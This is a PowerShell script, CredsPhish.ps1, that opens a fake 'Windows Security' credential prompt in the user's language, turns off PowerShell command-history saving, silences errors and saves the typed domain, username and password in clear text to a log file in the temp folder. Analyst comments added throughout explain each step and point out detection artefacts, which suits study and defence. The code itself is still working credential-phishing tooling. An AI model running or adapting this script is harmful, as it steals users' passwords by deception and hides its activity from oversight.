CredsPhish.ps1
<#
.SYNOPSIS
Prompt the current user for a valid credential.
Author: @r00t-3xp10it
Tested Under: Windows 10 (19044) x64 bits
Required Dependencies: none
Optional Dependencies: none
PS cmdlet Dev version: v1.2.6
.DESCRIPTION
This module spawns a remote 'PromptForCredential' dialog box
in the hope that the target enters their credentials to leak them.
.NOTES
Supported languages: pt-PT,en-AU,pt-BZ,pt-BR,en-IE,de-AT,de-FR,eu-ES,nl,nl-BQ
.Parameter PhishCreds
Accepts arguments: Start (default: Start)
.EXAMPLE
PS C:\> .\CredsPhish.ps1 -PhishCreds start
Prompt the current user for a valid credential.
.OUTPUTS
Domain UserName Password
------ -------- --------
SKYNET pedro s3cr3t
#>
## Script body: shows a credential dialog captioned "Windows Security" from the
## PowerShell host and writes whatever is typed, in clear text, to
## "$Env:TMP\creds.log". Comments below are analyst notes for triage/detection.
## Non-Positional cmdlet named parameters
## -UserAccount defaults to the current user name but is not referenced again in
## this script; -PhishCreds gates the whole body and defaults to "Start".
[CmdletBinding(PositionalBinding=$false)] param(
[string]$UserAccount=$([Environment]::UserName),
[string]$PhishCreds="Start"
)
## Error output is silenced for the rest of the script, so failures in the
## steps below leave nothing on the console.
$ErrorActionPreference = "SilentlyContinue"
## Stops PSReadLine from saving command history for this session.
## NOTE(review): this setting only concerns PSReadLine history; script block
## logging (event 4104), module logging and transcription are separate controls
## and should still record this script where they are enabled - confirm in the
## environment's logging policy.
## NOTE(review): the parameter is written with an en dash rather than an ASCII
## hyphen; detections that string-match "-HistorySaveStyle" should normalise
## dash characters before matching.
Set-PSReadlineOption –HistorySaveStyle SaveNothing|Out-Null
## -ieq is a case-insensitive comparison; any other value skips everything.
If($PhishCreds -ieq "Start")
{
Write-Host ""
## Supported languages
## Candidate dialog texts, one variable per language.
$message_ho = "Voer gebruikersgegevens in"
$message_en = "Please enter user credentials"
$message_it = "Inserire le credenziali dell'utente"
$message_ge = "Bitte geben Sie Ihre Anmeldedaten ein"
$message_pt = "Introduzir as credenciais de utilizador"
$message_sp = "Por favor, introduzca sus credenciales de usuario"
$message_fr = "Veuillez saisir les informations d'identification de l'utilisateur"
## Get the first installed language with Get-WinUserLanguageList
# if no supported language is found the script will use English.
$language = $(Get-WinUserLanguageList)[0].LanguageTag
## Pick the dialog text from the language tag. -match is a case-insensitive
## regex match, so each test succeeds when the pattern occurs anywhere in the tag.
If($language -match 'en-AU')
{
$message = $message_en
}
ElseIf(($language -match 'pt-PT') -or ($language -match 'pt-BZ') -or ($language -match 'pt-BR'))
{
$message = $message_pt
}
ElseIf($language -match 'en-IE')
{
$message = $message_it
}
ElseIf($language -match 'de-AT')
{
$message = $message_de
}
ElseIf($language -match 'de-FR')
{
$message = $message_fr
}
ElseIf($language -match 'eu-ES')
{
$message = $message_sp
}
ElseIf(($language -match 'nl') -or ($language -match 'nl-BQ'))
{
$message = $message_ho
}
Else
{
## Fallback for every tag not matched above.
$message = $message_en
}
## The dialog is raised by the PowerShell host ($Host.UI), with the caption
## "Windows Security" and the user field pre-filled as DOMAIN\USER from the
## environment. For awareness and triage: the prompt belongs to the PowerShell
## process that runs this script, not to the Windows logon UI.
$cred = ($Host.ui.PromptForCredential("Windows Security", "$message", "$Env:USERDOMAIN\$Env:USERNAME",""))
## $username, $domain and $full are assigned here but not read again below.
$username = "$Env:USERNAME";$domain = "$Env:USERDOMAIN";$full = "$domain" + "\" + "$username" -join ''
## GetNetworkCredential() exposes the typed password as a plain string.
$password = $cred.GetNetworkCredential().password
## The AccountManagement assembly is loaded, but nothing in this script calls
## into it: the input is not checked against the account, so the log may hold
## whatever was typed, valid or not.
Add-Type -assemblyname System.DirectoryServices.AccountManagement
$output = $cred.GetNetworkCredential()|Select-Object Domain,UserName,Password|Format-Table
## Host artefact: "$Env:TMP\creds.log", ASCII, overwritten on each run (-Force),
## holding Domain / UserName / Password in clear text. A powershell process
## creating this file is a usable detection point; if the file is found, treat
## the listed account's password as exposed and reset it.
echo $output|Out-File "$Env:TMP\creds.log" -encoding ascii -force
}